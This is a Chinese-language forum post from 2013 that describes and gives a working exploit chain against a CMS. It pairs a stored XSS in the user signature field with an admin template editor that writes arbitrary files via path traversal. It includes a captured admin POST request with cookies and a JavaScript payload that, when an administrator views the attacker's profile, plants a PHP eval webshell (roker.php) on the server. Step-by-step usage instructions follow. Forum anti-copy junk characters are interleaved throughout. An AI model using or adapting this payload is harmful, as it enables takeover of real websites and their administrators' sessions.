|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
( z$ E- t# [8 Q8 ^: o官网已经修补了,所以重新下了源码
. D, \9 C9 _- I' ?- O因为 后台登入 还需要认证码 所以 注入就没看了。( n! z, _8 y) L: F" B! Q
存在 xss
0 |3 Z% B/ Z$ I- ~, O0 T7 Y漏洞文件 user/member/skin_edit.php% ~. K- q' Z+ i8 h- L. z1 I
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
0 `/ z8 k" g/ t6 r8 Y. g! L & L9 f' C, O, I: H
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
# x% A3 G6 F6 i' s" ?- ^" {$ {
, P, s5 h5 O% r( q</textarea></td></tr>+ ]( {2 v1 f1 I" m2 p9 `
# }& }1 J G$ k x* i& X- {
user/do.php ( S) B0 j8 [. w _0 [& r1 Q. T
- E- l! ?/ B, B7 D; N7 C& o: D
* o. i4 z) e- S% o9 V. J+ oif($op=='zl'){ //资料
% q1 ?2 F" r. ?) e
5 U* G7 P& r& T$ l t( a if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
8 o& K! j+ h8 S( o exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
- a% d# A$ f; U ( [" Q; c8 s' y! W P) V: N( ?
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',4 V, m" v# Y% N) x$ o2 t
6 G$ y3 q; S2 @- o CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'8 L% Z6 u: P7 |* Y0 J
where CS_Name='".$cscms_name."'";9 C3 R! o2 E- [
: r3 D: V5 L- Z( c; v! U if($db->query($sql)){% M; v4 b! }+ J$ ]- [
l m, y$ l5 t% _; v+ S
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
: F6 c5 n; A9 S& l
. L" }' }& J0 C, l }else{
4 g* H, V {' N+ d: y \ 2 E+ i* B: M$ j2 |. e
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));2 f3 m$ o: J( B2 Q. }, i3 ^
. ?; D9 x+ Q. o' X% A( S
}5 t6 w$ U- H8 h& T/ w/ f) y
4 v, \" A( S- e7 g& F6 S1 s
2 I6 }* I" l/ `4 @& Q G没有 过滤导致xss产生。 f$ O f/ }; s% V- R' \; D
后台 看了下 很奇葩的是可以写任意格式文件。。
7 E2 w6 @, }( ]1 I9 ` p6 b: k+ G抓包。。' D: q8 o+ \/ `0 g0 L0 w9 T* S
3 l" G+ | Z& X
5 j9 ]; W; \. L6 A; e1 v
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.12 x0 H/ h4 U0 K6 g; `& F
+ K# ?, O0 t5 n+ \6 ~; k) J8 c# r
Accept: text/html, application/xhtml+xml, */*0 V, _$ K. N8 j; m) W8 D( M
) X* W: `3 F6 O' F0 \' M# \
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php8 R! C+ S& A; {7 ^, Q
$ G; a: H0 A& O: T8 {, [& dAccept-Language: zh-CN
* x; F, j# J P, s: B 0 g4 B3 x& ^# }5 @8 c8 _
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
9 V. C0 \( Y: ?1 |* u/ i+ X
9 l0 @" W1 [# j. E6 K' E# Q% k9 w0 WContent-Type: application/x-www-form-urlencoded
7 k8 ]) u$ D4 s " i* k( |5 @9 M4 R. Z" G
Accept-Encoding: gzip, deflate- W, C. ]; R. k$ a8 _" R
$ K9 R4 e* a( u9 [
Host: 127.0.0.12 c8 x7 u' T* j) Z. I# t9 _' A
8 `/ M" {! r/ ]" X4 d
Content-Length: 38% v: G( y% J) ~' \% F0 A
/ I% h( X; i: dDNT: 13 h& K' S$ k. f" g
, |8 R$ b, E+ ~
Connection: Keep-Alive6 a) \0 z4 F8 @: y
s0 \4 G' K2 ^# W- i: ^2 h0 w
Cache-Control: no-cache3 Z8 K t3 N+ `1 M9 x4 s7 |, w
1 {8 G! B7 _$ v3 Y" `, WCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
& b% i' |. c6 O) z v/ G9 m2 C2 j! [$ N& X9 t; x2 a; g
/ k8 I+ ]: P% @4 n3 U& ]
name=aaa.php&content=%3Cs%3E%3Ca%25%3E- {( }8 r" ]6 {" |4 L
3 k& y. Q% n5 C; X* ^6 i
$ V% m+ M3 T) n4 z+ s3 B
- s3 {% S N% G2 u/ z& \) G于是 构造js如下。3 {% m. F( ^5 I( a# w
; O/ J) ~/ J) w0 n" V
本帖隐藏的内容<script> 2 t8 J& [' y7 G. K
thisTHost = top.location.hostname;
2 W' ]/ b4 r6 `* ` + |# a- J3 J- Z3 w4 ^2 n$ O
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
D7 U u( Z4 N8 o( z4 G( u1 ? " O( Y+ B6 q ^/ S7 X7 i
function PostSubmit(url, data, msg) { / m' c( R. @$ e- g% t7 q5 r
var postUrl = url;
, Y$ ~0 H% \; n
( I' V% h6 {6 F% G/ _3 P J var postData = data;
8 K2 M( Z1 B( u2 v3 k var msgData = msg; 6 B4 R( V! K( |6 Z
var ExportForm = document.createElement("FORM"); u8 c b7 Z' l# z$ S
document.body.appendChild(ExportForm); ( j/ A ]4 w! T+ @* n% {$ C
ExportForm.method = "POST";
- p n% ?+ T0 ^% M9 Z2 c var newElement = document.createElement("input"); ( w% e6 }7 o3 ^6 }
newElement.setAttribute("name", "name"); 9 F" q1 s1 i% y1 d- m, A
newElement.setAttribute("type", "hidden"); , Q( x* V# Z4 g& |
var newElement2 = document.createElement("input"); & \4 S' @# C. X- ~
newElement2.setAttribute("name", "content"); - }) ]' I: ~: o5 c
newElement2.setAttribute("type", "hidden"); $ O" s1 k( i9 r+ \$ e( A0 K
ExportForm.appendChild(newElement); ( {* }) h! s! g3 q1 J
ExportForm.appendChild(newElement2);
3 _+ V6 X, m7 ^, J5 F; m newElement.value = postData; 1 A. {+ K6 v. q2 t: t
newElement2.value = msgData;
/ \# m1 B. l' v' L+ Y. D: s ExportForm.action = postUrl; 5 r! ]4 H* ?% |. H* B( I
ExportForm.submit();
~$ A; h' {9 ]( ^( ^* t2 l};
* s+ E$ l9 j$ C + L5 t# r @, N. e
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
( p9 V6 p0 O4 B# M3 O2 u : n: s" Y& c7 }' i! i
</script>
+ S% b! f- [# \, L0 Z3 a* m& ^3 W7 y2 E; \
1 g' h. t* L" \' C+ R' C
9 a' s8 G6 d# ^3 [4 Ohttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
, ?. H- [9 h9 C2 V用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)' T& p8 U2 a4 ?: Z4 `
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
, m2 \* v0 p+ V m
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对